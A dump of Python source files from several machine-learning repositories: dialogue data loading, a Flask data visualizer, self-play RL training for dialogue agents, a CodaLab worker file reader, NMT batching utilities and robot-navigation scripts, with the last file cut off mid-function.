"""this function combines adjacent utternaces that belong to the same talker
into one. Sometimes time_stamp could be None.
For example
<t1> how are you. <t2> I am good. <t2> And you? <eod> <t1>
will be combined into
<t1> how are you. <t2> I am good. And you? <eod> <t1>
"""
new_utterance = []
new_time_stamp = []
for i, utt in enumerate(utterances):
if len(utt.strip()) == 0:
continue
utts = utt.split(':')
talker = utts[0]
sentence = ':'.join(utts[1:]).strip()
if len(sentence) == 0:
continue
if len(new_utterance) == 0 or talker != new_utterance[-1].split(':')[0]:
new_utterance.append(add_dot(utt))
if time_stamp:
new_time_stamp.append(time_stamp[i])
else:
new_utterance[-1] += ' ' + add_dot(sentence)
if time_stamp:
new_time_stamp[-1] = time_stamp[i]
return new_utterance, new_time_stamp
def delete_non_ascii(s):
return ''.join([x for x in s if x in printable])
def load_and_drop(data_file, kb_file, drop_incorrect=True, verbose=False):
""" this function filter incorrect samples without standardization."""
fin_data = gfile.GFile(data_file)
fin_kb = gfile.GFile(kb_file)
total_in_file = 0
loaded_data = []
loaded_kb = []
for line1 in tqdm(fin_data, desc='loading data'):
if len(line1.strip()) < 10:
continue
line2 = fin_kb.readline()
if len(line2.strip()) < 10:
continue
line1 = delete_non_ascii(line1)
line2 = delete_non_ascii(line2)
data_obj = json.loads(line1)
kb_obj = json.loads(line2)
if (not drop_incorrect) or (
'correct_sample' not in data_obj) or data_obj['correct_sample']:
loaded_data.append(data_obj)
loaded_kb.append(kb_obj)
total_in_file += 1
if verbose:
print(('loaded: ', len(loaded_data), '/', total_in_file, '=',
len(loaded_data) * 1.0 / total_in_file))
return loaded_data, loaded_kb
def load_and_drop_stream(data_file,
kb_file,
drop_incorrect=True,
verbose=False):
""" this function filter incorrect samples without standardization."""
if verbose:
print('loading stream')
fin_data = gfile.GFile(data_file)
if gfile.exists(kb_file):
fin_kb = gfile.GFile(kb_file)
else:
fin_kb = None
if verbose: print("gfile loaded: ", fin_data)
for line1 in fin_data:
if verbose:
print(line1)
if len(line1.strip()) < 10:
continue
line1 = delete_non_ascii(line1)
data_obj = json.loads(line1)
if fin_kb:
line2 = fin_kb.readline()
if len(line2.strip()) < 10:
continue
line2 = delete_non_ascii(line2)
kb_obj = json.loads(line2)
else:
kb_obj = None
if (not drop_incorrect) or (
'correct_sample' not in data_obj) or data_obj['correct_sample']:
yield data_obj, kb_obj
def standardize_and_drop(data_file,
kb_file,
drop_incorrect=True,
verbose=False):
""" this function filter incorrect samples and standardize them
the same time.
"""
loaded_data, loaded_kb = load_and_drop(data_file, kb_file, drop_incorrect,
verbose)
for data_obj in tqdm(loaded_data, desc='standardizing data'):
org_time = data_obj['timestamps'] if 'timestamps' in data_obj else None
org_diag = data_obj['dialogue'] if 'dialogue' in data_obj else None
if org_diag:
new_diag, new_time = standardize_message(org_diag, org_time)
data_obj['dialogue'] = new_diag
if new_time:
data_obj['timestamps'] = new_time
assert len(data_obj['dialogue']) == len(data_obj['timestamps'])
return loaded_data, loaded_kb
```
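A small illustrative call for standardize_message (the speaker prefixes follow the `<tN>:` convention the function splits on; the utterances are made up):
```python
dialogue = ["<t1>: hi there", "<t2>: hello", "<t2>: how are you?"]
merged, _ = standardize_message(dialogue)
assert merged == ["<t1>: hi there.", "<t2>: hello. how are you?"]
```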
#### File: airdialogue/visualizer/visualizer_main.py
```python
import argparse
import json
import linecache
import os
from os.path import expanduser
from flask import Flask
from flask import request
from airdialogue.visualizer.utils import generate_html
import sys
def strip_prefix(name):
if name.endswith("data"):
return name[0:-5]
else:
return name[0:-3]
def get_partitions(path):
"""This function counts the number of occurries of the same prefix in the
json dir. If it happens more than twice we will use that as a valid
partition and add it to the partition list."""
all_files = os.listdir(path)
prefix_freq = {}
for f in all_files:
if f.endswith(".json"):
prefix = f.split(".")[0]
prefix = strip_prefix(prefix)
if prefix not in prefix_freq:
prefix_freq[prefix] = 0
prefix_freq[prefix] += 1
valid_partitions = []
for prefix in prefix_freq:
if prefix_freq[prefix] >= 2:
valid_partitions.append(prefix)
return valid_partitions
def wrapper(FLAGS):
def home():
# get all the partitions in the directory
expanded_data_path = expanduser(FLAGS.data_path)
partitions = get_partitions(expanded_data_path)
index = request.form.get("index")
if index:
index = int(index)
partition = request.form.get("partition")
if not partitions:
print("no data is found in the directory")
return """No partitions found under {0}. Supported partitions has to end
with .json extension.""".format(FLAGS.data_path)
if not partition:
# choose a default partition
if "train" in partitions:
partition = "train"
else:
partition = partitions[0].strip()
index = 1
try:
line_data = linecache.getline(
os.path.join(expanded_data_path, "{0}_data.json".format(partition)),
index)
line_kb = linecache.getline(
os.path.join(expanded_data_path, "{0}_kb.json".format(partition)),
index)
except:
return "Invalid index."
if (not line_data) and (not line_kb):
print("invalid partition number.")
return "Invalid partition or index."
data_object = json.loads(line_data)
kb_object = json.loads(line_kb)
html_source = generate_html(data_object, kb_object, index, partitions,
partition)
return html_source
return home
def add_arguments(parser):
"""Build ArgumentParser."""
parser.add_argument("--host", type=str, default="0.0.0.0",
help="host name for the visualizer.")
parser.add_argument("--port", type=int, default=5555,
help="port number of the visualizer server.")
parser.add_argument("--data_path", type=str, default=None,
help="path that stores data and kb files.")
def main(FLAGS):
app = Flask(__name__)
app.route("/", methods=["POST", "GET"])(wrapper(FLAGS))
app.run(host=FLAGS.host, port=FLAGS.port, debug=True)
if __name__ == "__main__":
this_parser = argparse.ArgumentParser()
add_arguments(this_parser)
FLAGS, unparsed = this_parser.parse_known_args()
main(FLAGS)
``` |
{
"source": "josephch405/airdialogue_model",
"score": 3
} |
#### File: josephch405/airdialogue_model/dialogue.py
```python
import math
import sys
import numpy as np
import tensorflow as tf
from utils import dialogue_utils
from utils import misc_utils as utils
class Conversation(object):
"""The Conversation class models the behavior of a single self-play conversation.
"""
def get_initial_utterance(self, speaker):
# the situation is different here because we removed a speaker flip right
# after this is initialized
if speaker == 0:
return ['<t1>'] # it means we let speaker 0 to talk now
else:
return ['<t2>']
def __init__(self, max_diag_len, turn1_token, turn2_token, num_utterance,
speaker):
self.utt_arr = []
self.action_arr = []
self.is_finished = []
self.turn1_token = turn1_token
self.turn2_token = turn2_token
self.max_diag_len = max_diag_len
for i in range(num_utterance):
self.utt_arr.append([])
self.is_finished.append(False)
self.action_arr.append([])
for i in range(num_utterance):
utt = self.get_initial_utterance(speaker)
self.utt_arr[i].extend(utt)
def get_start_and_end_token(self, speaker):
if speaker == 0:
begin_token = self.turn1_token
end_token = self.turn2_token
else:
begin_token = self.turn2_token
end_token = self.turn1_token
return begin_token, end_token
def process(self, new_utterances1, new_utterances2, actions, speaker,
last_round):
def apply_filter(filter_token, utterance):
try:
ind = utterance.index(filter_token)
# print ('ind found', ind,utterance[:ind] )
return utterance[:ind], True
except: # filter_token not found
return utterance, False
begin_token, end_token = self.get_start_and_end_token(speaker)
new_utterances_all = new_utterances1 if speaker == 0 else new_utterances2
for i, (np_utterance, ac) in enumerate(zip(new_utterances_all, actions)):
if self.is_finished[i]:
continue
new_utterances = []
for token in np_utterance:
new_utterances.append(token)
new_utterances = list(map(lambda bs: bs.decode(), new_utterances))
# 1. get sub_str before begin_tokens as they are invalid
new_utterances, _ = apply_filter(begin_token, new_utterances)
# 2. get sub_str before end token
new_utterances, _ = apply_filter(end_token, new_utterances)
# 3. get sub_str before end_of dialogue
new_utterances, terminated = apply_filter('<eod>', new_utterances)
# 4. cap on max_length
remaining_informative_words = self.max_diag_len - len(self.utt_arr[i]) - 1
if terminated:
remaining_informative_words -= 1 # we need to add <eod>
new_utterances = new_utterances[:remaining_informative_words]
new_utterances = list(new_utterances)
##### start putting it together
# 6. add eod
if terminated:
new_utterances.append('<eod>')
if terminated or last_round:
self.action_arr[i] = [s.decode() for s in ac]
self.is_finished[i] = True
# 7. add end token
new_utterances.append(end_token)
self.utt_arr[i].extend(new_utterances)
return sum(self.is_finished) == len(self.is_finished)
def get_train_data(self):
# print("self.utt_arr", self.utt_arr)
return self.utt_arr, self.action_arr
class SelfplayDialogue(object):
"""The SelfplayDialogue can be reused for multiple conversations."""
def __init__(self, mutable_model, immutable_model, mutable_sess,
immutable_sess, max_dialogue_turns, train_threadhold,
turn1_token, turn2_token, eod_token, summary_writer,
dialogue_mode, hparams):
# model and session
self.mutable_model = mutable_model
self.immutable_model = immutable_model
self.mutable_sess = mutable_sess
self.immutable_sess = immutable_sess
# iterators
self.mutable_handles = self.mutable_sess.run([
mutable_model.train_iterator.string_handle(),
mutable_model.self_play_ft_iterator.string_handle(),
mutable_model.self_play_st_iterator.string_handle()
])
self.immutable_handles = self.immutable_sess.run([
immutable_model.train_iterator.string_handle(),
immutable_model.self_play_ft_iterator.string_handle(),
immutable_model.self_play_st_iterator.string_handle()
])
self.iterator_mode = 1 # 1 is fulltext, 2 is structured
self.summary_writer = summary_writer
self.dialogue_mode = dialogue_mode
self.batch_size = hparams.self_play_batch_size
self.self_play_eval_batch_size = hparams.self_play_eval_batch_size
self.update_batch_size = hparams.self_play_update_batch_size
self.hparams = hparams
self.gamma = hparams.reward_discount
assert mutable_model.model.mode == dialogue_utils.mode_self_play_mutable
# parameters
self.max_dialogue_turns = max_dialogue_turns
# won't train the model until train_threadhold samples are reached
self.train_threadhold = train_threadhold
self.turn1_token = turn1_token
self.turn2_token = turn2_token
self.turn_tokens = [turn1_token, turn2_token]
self.eod_token = eod_token
# initialization
self.train_samples = []
self.train_counter = 0
self.train_it_initialized = False
##### stats on rl vs sl updates
self.num_rl_updates = 0
self.num_sl_updates = 0
def format_samples_batch(self,
batch_intent,
batch_pred_action,
batch_truth_action,
batch_utterance,
batch_reward_diag,
batch_reward_action,
batch_size,
boundary=None):
output_data = []
for i in range(batch_size):
utterance = ' '.join(batch_utterance[i])
# compute the boundary per sample unless one was supplied by the caller;
# a local variable avoids reusing the first sample's boundary for later ones
sample_boundary = boundary
if not sample_boundary:
boundary1 = self.get_dialogue_boundary(self.turn_tokens[0], utterance,
self.turn_tokens[0],
self.turn_tokens[1])
sample_boundary = boundary1[0] + boundary1[1]
str_b = []
for ele in sample_boundary:
str_b.append(str(ele))
intent = batch_intent[i]
pred_action = batch_pred_action[i]
truth_action = batch_truth_action[i]
reward_diag, reward_action = batch_reward_diag[i], batch_reward_action[i]
arr = [
intent, pred_action, truth_action, utterance, ' '.join(str_b),
reward_diag, reward_action
]
output_data.append('|'.join(arr))
return output_data
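# Illustrative sketch (hypothetical values): each batch element is serialized
# as a single pipe-delimited record, so one line of output_data might look like
#   'book_flight|s|s|<t1> hello <t2> hi|0 2|0.5|0.5'
# where the fields are intent, predicted action, ground-truth action, the
# flattened utterance, the turn boundaries, and the two reward strings.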
def generate_utterance_ordinary(self, data, kb, self_play_model, sess,
batch_size, handles):
if self.iterator_mode == 1:
real_iterator = self_play_model.self_play_ft_iterator
else:
real_iterator = self_play_model.self_play_st_iterator
sess.run(
real_iterator.initializer,
feed_dict={
self_play_model.data_placeholder: data,
self_play_model.kb_placeholder: kb,
self_play_model.batch_size_placeholder: batch_size
})
iterator_handle = handles[self.iterator_mode]
res = self_play_model.model.generate_self_play_utterance(
sess, iterator_handle)
return res
def generate_utterance(self, batch_intent, conv, kb,
speaker, turn, batch_size):
# prepare output
utt = conv.get_train_data()
composit_data = self.format_samples_batch(
batch_intent=batch_intent,
batch_pred_action=['s'] * batch_size,
batch_truth_action=['s'] * batch_size,
batch_utterance=utt[0], # utterance
batch_reward_diag=['0.5'] * batch_size,
batch_reward_action=['0.5'] * batch_size,
batch_size=batch_size)
composit_kb = kb
self_play_model, sess, handles = self.agents[speaker]
new_utt1, new_utt2, new_action = self.generate_utterance_ordinary(
composit_data, composit_kb, self_play_model, sess, batch_size, handles)
all_finished = conv.process(new_utt1, new_utt2, new_action, speaker,
turn == self.max_dialogue_turns - 1)
return all_finished
def parse_input(self, batch_input_data, batch_input_kb):
batch_intent = []
batch_action = []
batch_kb = batch_input_kb
for input_data in batch_input_data:
intent, action = input_data.split('|')
batch_intent.append(intent)
batch_action.append(action)
return batch_intent, batch_action, batch_kb
def do_rl_training(self, data, kb, batch_size, model, sess, speaker,
global_step, self_play_handle):
if self.iterator_mode == 1:
self_play_iterator = model.self_play_ft_iterator
elif self.iterator_mode == 2:
self_play_iterator = model.self_play_st_iterator
else:
raise Exception('not defined self_play_mode')
# first do initialization
sess.run(
self_play_iterator.initializer,
feed_dict={
model.data_placeholder: data,
model.kb_placeholder: kb,
model.batch_size_placeholder: batch_size
})
# second, do training
res = model.model.self_play(sess, speaker, self_play_handle)
all_summaries = res[-1]
if self.summary_writer:
for key in all_summaries:
utils.add_summary(self.summary_writer, global_step,
self.dialogue_mode + '_' + key, all_summaries[key])
global_step = res[2]
self.num_rl_updates += 1
return global_step
def do_SL_training(self, model, sess, global_step, train_handle):
# first do initialization
if not self.train_it_initialized:
sess.run(
model.train_iterator.initializer,
feed_dict={model.skip_count_placeholder: 0})
self.train_it_initialized = True
# second, do training
while True:  # keep trying until no exception is raised
try:
res = model.model.self_play_train(sess, train_handle)
break
except tf.errors.OutOfRangeError:
sess.run(
model.train_iterator.initializer,
feed_dict={model.skip_count_placeholder: 0})
continue
all_summaries = res[-1]
if self.summary_writer:
for key in all_summaries:
utils.add_summary(self.summary_writer, global_step,
self.dialogue_mode + '_' + key, all_summaries[key])
global_step = res[-2]
self.num_sl_updates += 1
return global_step
def get_dialogue_boundary(self, start_token, flat_dialogue, start_of_turn1,
start_of_turn2):
def get_end_token(start, set_of_end_tokens, splitted_dialogues):
for i in range(start, len(splitted_dialogues)):
if splitted_dialogues[i] in set_of_end_tokens:
return i
assert False, 'end token not found :' + ' start=' + str(
start) + '/' + str(len(splitted_dialogues))
def get_next_start_token(end_position, start_token, splitted_dialogues):
for i in range(end_position, len(splitted_dialogues)):
if splitted_dialogues[i] == start_token:
return i
return len(splitted_dialogues)
set_of_end_tokens = set([
start_of_turn1, start_of_turn2
]) # taking out end_of_dialogue token because of dynamic rnn decoder
splitted_dialogue = flat_dialogue.split(' ')
i = get_next_start_token(0, start_token, splitted_dialogue)
all_starts = []
all_ends = []
while i < len(splitted_dialogue) - 1:  # we don't find the end token for the last turn change.
end_position = get_end_token(i + 1, set_of_end_tokens, splitted_dialogue)
assert splitted_dialogue[end_position] != start_token, (
'start token '
'appeared twice') + ''.join(flat_dialogue)
all_starts.append(i)
all_ends.append(end_position)
i = get_next_start_token(i + 1, start_token, splitted_dialogue)
return (all_starts, all_ends)
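# Worked sketch with hypothetical turn tokens '<t1>' and '<t2>':
#   get_dialogue_boundary('<t1>', '<t1> hi <t2> hello <t1> bye <t2>', '<t1>', '<t2>')
# scans for each '<t1>' start and the next turn token, returning
#   ([0, 4], [2, 6])
# i.e. the '<t1>' turns span word indexes [0, 2) and [4, 6).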
def scale_reward_batch(self, b_final_reward, gamma, b_diag):
batch_reward_diag = []
batch_reward_action = []
for final_reward, diag in zip(b_final_reward, b_diag):
diag_len = len(diag)
reward_len = diag_len + self.hparams.len_action
all_ind = list(range(reward_len - 1, -1, -1))
all_rewards = []
for i in range(len(all_ind)):
all_rewards.append(str(math.pow(gamma, all_ind[i]) * final_reward))
reward_diag = all_rewards[0:-1 * self.hparams.len_action]
reward_action = all_rewards[-1 * self.hparams.len_action:]
batch_reward_diag.append(' '.join(reward_diag))
batch_reward_action.append(' '.join(reward_action))
return batch_reward_diag, batch_reward_action
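# Worked sketch (hypothetical numbers): with gamma = 0.5, final_reward = 1.0,
# a 3-token dialogue and hparams.len_action = 1, reward_len = 4, so the
# discounted rewards are [0.5**3, 0.5**2, 0.5**1, 0.5**0] = [0.125, 0.25, 0.5, 1.0];
# the first three go to reward_diag ('0.125 0.25 0.5') and the last one to
# reward_action ('1.0').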
def maybe_train(self, sample, speaker, global_step, force=False):
self.train_samples.append(sample)
if force or len(self.train_samples) >= self.train_threadhold:
# first generate training examples
data_arr = []
kb_arr = []
for sample in self.train_samples: # each sample is a batch of data
intent, pred_action, truth_action, utterance, kb = sample # batch version
all_rewards = dialogue_utils.compute_reward_batch(
utterance, pred_action, truth_action, kb,
self.hparams) # batch version
train_reward, _, _, _, _, _, _, _, _ = all_rewards
final_reward = train_reward
reward_diag, reward_action = self.scale_reward_batch(
final_reward, self.gamma, utterance) # in batches
flat_pred_action = []
for k in range(len(pred_action)):
flat_pred_action.append(' '.join(pred_action[k]))
new_data_arr = self.format_samples_batch(
batch_intent=intent,
batch_pred_action=flat_pred_action,
batch_truth_action=truth_action,
batch_utterance=utterance,
batch_reward_diag=reward_diag,
batch_reward_action=reward_action,
batch_size=self.update_batch_size)
data_arr.extend(new_data_arr)
kb_arr.extend(kb)
data_output, kb_output = data_arr, kb_arr
new_global_step = None
self.train_samples = [] # clean up
self_play_handle = self.mutable_handles[self.iterator_mode]
if self.hparams.rl_training:
new_global_step = self.do_rl_training(
data_output, kb_output, self.update_batch_size, self.mutable_model,
self.mutable_sess, speaker, global_step, self_play_handle)
print('self.hparams.self_play_sl_multiplier=',
self.hparams.self_play_sl_multiplier)
if self.hparams.self_play_sl_multiplier >= 0: # train multiple or don't train at all
print('do', self.hparams.self_play_sl_multiplier, 'supervised training')
for _ in range(self.hparams.self_play_sl_multiplier):
new_global_step = self.do_SL_training(self.mutable_model,
self.mutable_sess, global_step,
self.mutable_handles[0])
else:
print('do one supervised training')
if self.train_counter >= abs(self.hparams.self_play_sl_multiplier):
new_global_step = self.do_SL_training(self.mutable_model,
self.mutable_sess, global_step,
self.mutable_handles[0])
self.train_counter = 0
else:
self.train_counter += 1
if self.summary_writer:
utils.add_summary(
self.summary_writer, new_global_step,
self.dialogue_mode + '_' + 'sl_rl',
self.num_sl_updates * 1.0 / (self.num_rl_updates + 0.0001))
return new_global_step
return None
def talk(self, max_diag_length, batch_input_data, batch_input_kb, agent1,
agent2, worker_step, batch_size, speaker=None):
"""The main procedure to generate a single self play conversation."""
# parse data
bs_intent, bs_truth_action, bs_kb = self.parse_input(
batch_input_data, batch_input_kb)
# remember the roles of agents
self.agents = [agent1, agent2]
# In selfplay training the speaker will be None and we randomly choose an
# initial speaker and initialize the utterance.
# In selfplay evaluation the speaker will be specified, so we use it as is.
if speaker is None: speaker = int(np.random.random() < 0.5)
# generate the conversation instance for this conversation.
# print ('self.batch_size', self.batch_size)
conv = Conversation(max_diag_length, self.turn1_token, self.turn2_token,
batch_size, speaker)
# generate conversation by turn in batch mode until all conversations
# terminated (finished = True) or the number of turns reached the maximum.
turn = 0
finished = False
while (not finished) and turn < self.max_dialogue_turns:
finished = self.generate_utterance(bs_intent, conv,
bs_kb, speaker, turn, batch_size)
# Change the speaker as we move to the next turn.
speaker = (speaker + 1) % 2
turn += 1
all_rewards = dialogue_utils.compute_reward_batch(
conv.utt_arr, conv.action_arr, bs_truth_action, bs_kb, self.hparams)
metrics = dialogue_utils.calculate_reward_metrics(all_rewards)
metrics['num_turns'] = turn
# print out step stats only in debug mode
if self.summary_writer and self.hparams.debug:
for key in metrics:
utils.add_summary(self.summary_writer, worker_step,
self.dialogue_mode + '_' + key + '_ws', metrics[key])
utt_arr, bs_pred_action = conv.get_train_data()
if self.hparams.debug:
print('self_play debug: ' + bs_intent[0])
print('self_play debug: all_rewards', all_rewards[0])
print('self_play debug: ' + ' '.join(utt_arr[0]))
print('self_play debug: ' + ' '.join(bs_pred_action[0]))
sys.stdout.flush()
return (bs_intent, bs_pred_action, bs_truth_action, utt_arr,
bs_kb), turn, metrics
def flip_agent(self, mutable_agent, immutable_agent, flip='random'):
"""This function flips the role of mutable agent and immutable agent so that
they both have chances to play customer and agent. Remember both mutable
immutable models actually contain two sub-models: customer and agent. We
need to make sure that they have equal chances to serve as both parts when
doing the self play. In self play evaluation, this is chosen
deterministically based on the value of flip. In self play training, this
is chosen randomly.
"""
if flip == 'random':
flip = int(np.random.random() < 0.5)
if flip == 0:
# in the first flip mutable agent is agent 1 and immutable agent
# is agent 2.
return mutable_agent, immutable_agent, flip
else:
# in the second flip mutable agent is agent 2 and immutable agent
# is agent 1.
return immutable_agent, mutable_agent, flip
``` |
{
"source": "josephch405/codalab-worksheets",
"score": 3
} |
#### File: codalab/worker/reader.py
```python
from contextlib import closing
import http.client
import os
import threading
import codalab.worker.download_util as download_util
from codalab.worker.download_util import get_target_path, PathException
from codalab.worker.file_util import (
gzip_file,
gzip_bytestring,
read_file_section,
summarize_file,
tar_gzip_directory,
)
class Reader(object):
def __init__(self):
self.read_handlers = {
'get_target_info': self.get_target_info,
'stream_directory': self.stream_directory,
'stream_file': self.stream_file,
'read_file_section': self.read_file_section,
'summarize_file': self.summarize_file,
}
self.read_threads = [] # Threads
def read(self, run_state, path, read_args, reply):
read_type = read_args['type']
handler = self.read_handlers.get(read_type, None)
if handler:
handler(run_state, path, read_args, reply)
else:
err = (http.client.BAD_REQUEST, "Unsupported read_type for read: %s" % read_type)
reply(err)
def stop(self):
for thread in self.read_threads:
thread.join()
def _threaded_read(self, run_state, path, stream_fn, reply_fn):
"""
Given a run state, a path, a stream function and a reply function,
- Computes the real filesystem path to the path in the bundle
- In case of error, invokes reply_fn with an http error
- Otherwise starts a thread calling stream_fn on the computed final path
"""
try:
final_path = get_target_path(run_state.bundle_path, run_state.bundle.uuid, path)
except PathException as e:
reply_fn((http.client.NOT_FOUND, str(e)), None, None)
return
read_thread = threading.Thread(target=stream_fn, args=[final_path])
read_thread.start()
self.read_threads.append(read_thread)
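# Note on the assumed reply_fn contract (inferred from the call sites in this
# class): reply_fn(error, message_dict, payload), where exactly one of the
# error tuple (http_status, text) or the payload arguments is set, e.g.
#   reply_fn(None, {}, fileobj)  # success, streaming a file object
#   reply_fn((http.client.NOT_FOUND, 'no such path'), None, None)  # failure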
def get_target_info(self, run_state, path, args, reply_fn):
"""
Return target_info of path in bundle as a message on the reply_fn
"""
target_info = None
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
# if path is a dependency raise an error
if path and os.path.normpath(path) in dep_paths:
err = (
http.client.NOT_FOUND,
'{} not found in bundle {}'.format(path, run_state.bundle.uuid),
)
reply_fn(err, None, None)
return
else:
try:
target_info = download_util.get_target_info(
run_state.bundle_path, run_state.bundle.uuid, path, args['depth']
)
except PathException as e:
err = (http.client.NOT_FOUND, str(e))
reply_fn(err, None, None)
return
if not path and args['depth'] > 0:
target_info['contents'] = [
child for child in target_info['contents'] if child['name'] not in dep_paths
]
reply_fn(None, {'target_info': target_info}, None)
def stream_directory(self, run_state, path, args, reply_fn):
"""
Stream the directory at path using a separate thread
"""
dep_paths = set([dep.child_path for dep in run_state.bundle.dependencies.values()])
exclude_names = [] if path else dep_paths
def stream_thread(final_path):
with closing(tar_gzip_directory(final_path, exclude_names=exclude_names)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_thread, reply_fn)
def stream_file(self, run_state, path, args, reply_fn):
"""
Stream the file at path using a separate thread
"""
def stream_file(final_path):
with closing(gzip_file(final_path)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_file, reply_fn)
def read_file_section(self, run_state, path, args, reply_fn):
"""
Read the section of file at path of length args['length'] starting at
args['offset'] (bytes) using a separate thread
"""
def read_file_section_thread(final_path):
bytestring = gzip_bytestring(
read_file_section(final_path, args['offset'], args['length'])
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, read_file_section_thread, reply_fn)
def summarize_file(self, run_state, path, args, reply_fn):
"""
Summarize the file including args['num_head_lines'] and
args['num_tail_lines'] but limited with args['max_line_length'] using
args['truncation_text'] on a separate thread
"""
def summarize_file_thread(final_path):
bytestring = gzip_bytestring(
summarize_file(
final_path,
args['num_head_lines'],
args['num_tail_lines'],
args['max_line_length'],
args['truncation_text'],
).encode()
)
reply_fn(None, {}, bytestring)
self._threaded_read(run_state, path, summarize_file_thread, reply_fn)
``` |
{
"source": "josephch405/curriculum-nmt",
"score": 3
} |
#### File: josephch405/curriculum-nmt/utils.py
```python
import math
from typing import List
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import nltk
nltk.download('punkt')
from tqdm import tqdm
def pad_sents(sents, pad_token):
""" Pad list of sentences according to the longest sentence in the batch.
The paddings should be at the end of each sentence.
@param sents (list[list[str]]): list of sentences, where each sentence
is represented as a list of words
@param pad_token (str): padding token
@returns sents_padded (list[list[str]]): list of sentences where sentences shorter
than the max length sentence are padded out with the pad_token, such that
each sentences in the batch now has equal length.
"""
sents_padded = []
### YOUR CODE HERE (~6 Lines)
lens = map(lambda words: len(words), sents)
max_len = max(lens)
for sent in sents:
_sent = sent[:]
_sent += [pad_token] * (max_len - len(_sent))
sents_padded += [_sent]
### END YOUR CODE
return sents_padded
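# Illustrative example:
#   pad_sents([['a', 'b', 'c'], ['d']], '<pad>')
# returns
#   [['a', 'b', 'c'], ['d', '<pad>', '<pad>']]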
def read_corpus(file_path, source, space_tokenize=False, dev_mode=False):
""" Read file, where each sentence is dilineated by a `\n`.
@param file_path (str): path to file containing corpus
@param source (str): "tgt" or "src" indicating whether text
is of the source language or target language
@param space_tokenize (bool): Whether to tokenize with just spaces. Useful
for BPE input
@param dev_mode (bool): Only reads first 100 lines; for fast iteration
"""
data = []
i = 0
for line in tqdm(open(file_path)):
sent = nltk.word_tokenize(line) if not space_tokenize else line.strip().split()
# only append <s> and </s> to the target sentence
if source == 'tgt':
sent = ['<s>'] + sent + ['</s>']
data.append(sent)
# TODO: nicer iteration dev flag
i += 1
if i > 100 and dev_mode:
break
return data
def batch_iter(data, batch_size, shuffle=False):
""" Yield batches of source and target sentences reverse sorted by length (largest to smallest).
@param data (list of (src_sent, tgt_sent)): list of tuples containing source and target sentence
@param batch_size (int): batch size
@param shuffle (boolean): whether to randomly shuffle the dataset
"""
batch_num = math.ceil(len(data) / batch_size)
index_array = list(range(len(data)))
if shuffle:
np.random.shuffle(index_array)
for i in range(batch_num):
indices = index_array[i * batch_size: (i + 1) * batch_size]
examples = [data[idx] for idx in indices]
examples = sorted(examples, key=lambda e: len(e[0]), reverse=True)
src_sents = [e[0] for e in examples]
tgt_sents = [e[1] for e in examples]
yield src_sents, tgt_sents
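# Usage sketch (hypothetical data): each yielded batch is length-sorted so it
# can be packed into a padded tensor directly.
#   pairs = [(['a', 'b'], ['x']), (['c'], ['y', 'z']), (['d', 'e', 'f'], ['w'])]
#   for src, tgt in batch_iter(pairs, batch_size=2):
#       ...  # first batch: src = [['a', 'b'], ['c']], tgt = [['x'], ['y', 'z']]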
def get_pacing_batch(data, batch_size, shuffle=False):
""" Returns (not yields) a single batch of source and target sentences
@param data (list of (src_sent, tgt_sent)): list of tuples containing src and tgt sents
@param batch_size (int): batch size
@param shuffle (boolean): whether to randomly shuffle the dataset
"""
index_array = list(range(len(data)))
if shuffle:
np.random.shuffle(index_array)
indices = index_array[:batch_size]
examples = [data[idx] for idx in indices]
examples = sorted(examples, key=lambda e: len(e[0]), reverse=True)
src_sents = [e[0] for e in examples]
tgt_sents = [e[1] for e in examples]
return src_sents, tgt_sents
``` |
{
"source": "josephch405/rlkit",
"score": 2
} |
#### File: rlkit/scripts/run_gibson_policy.py
```python
import argparse
import torch
from rlkit.core import logger
from rlkit.samplers.rollout_functions import rollout
from rlkit.envs.wrappers import NormalizedBoxEnv
import rlkit.torch.pytorch_util as ptu
from rlkit.util.gibson import add_env_args, get_config_file, load_env
def simulate_policy(args):
data = torch.load(args.file)
policy = data['evaluation/policy']
if args.gpu:
ptu.set_gpu_mode(True)
policy.cuda()
print("set gpu")
print(ptu.device)
config_file = get_config_file(args.config_file)
env = NormalizedBoxEnv(
load_env(args, config_file, args.env_mode, ptu.device.index))
print("Policy loaded")
while True:
path = rollout(
env,
policy,
max_path_length=args.H,
render=False,
)
if hasattr(env, "log_diagnostics"):
env.log_diagnostics([path])
logger.dump_tabular()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file', type=str,
help='path to the snapshot file')
parser.add_argument('--H', type=int, default=300,
help='Max length of rollout')
parser.add_argument('--gpu', action='store_true')
add_env_args(parser)
args = parser.parse_args()
simulate_policy(args)
``` |
{
"source": "josephch405/selfmonitoring-agent",
"score": 3
} |
#### File: selfmonitoring-agent/scripts/generate_navigable_labels_multi.py
```python
import numpy as np
import cv2
import json
import math
import base64
import csv
import sys
from torchvision import transforms, models
import torch
import matplotlib.pyplot as plt
csv.field_size_limit(sys.maxsize)
sys.path.append('build')
# Caffe and MatterSim need to be on the Python path
import MatterSim
from timer import Timer
TSV_FIELDNAMES = ['scanId', 'viewpointId', 'nav']
VIEWPOINT_SIZE = 36 # Number of discretized views from one viewpoint
FEATURE_SIZE = 1000 # 2048
BATCH_SIZE = 4 # Some fraction of viewpoint size - batch size 4 equals 11GB memory
GPU_ID = 0
OUTFILE = 'img_features/navigable.tsv'
GRAPHS = 'connectivity/'
# Simulator image parameters
WIDTH=640
HEIGHT=480
VFOV=60
torch.set_grad_enabled(False)  # a bare torch.no_grad() call here was a no-op; disable autograd globally instead
def load_viewpointids():
viewpointIds = []
with open(GRAPHS+'scans.txt') as f:
scans = [scan.strip() for scan in f.readlines()]
for scan in scans:
with open(GRAPHS+scan+'_connectivity.json') as j:
data = json.load(j)
for item in data:
if item['included']:
viewpointIds.append((scan, item['image_id']))
print('Loaded %d viewpoints' % len(viewpointIds))
return viewpointIds
def build_tsv():
# Set up the simulator
sim = MatterSim.Simulator()
sim.setCameraResolution(WIDTH, HEIGHT)
sim.setCameraVFOV(math.radians(VFOV))
sim.setDiscretizedViewingAngles(True)
sim.setRenderingEnabled(False)
sim.init()
count = 0
t_render = Timer()
with open(OUTFILE, 'w') as tsvfile:
writer = csv.DictWriter(tsvfile, delimiter = '\t', fieldnames = TSV_FIELDNAMES)
# Loop all the viewpoints in the simulator
viewpointIds = load_viewpointids()
for scanId,viewpointId in viewpointIds:
t_render.tic()
# Loop all discretized views from this location
blobs = []
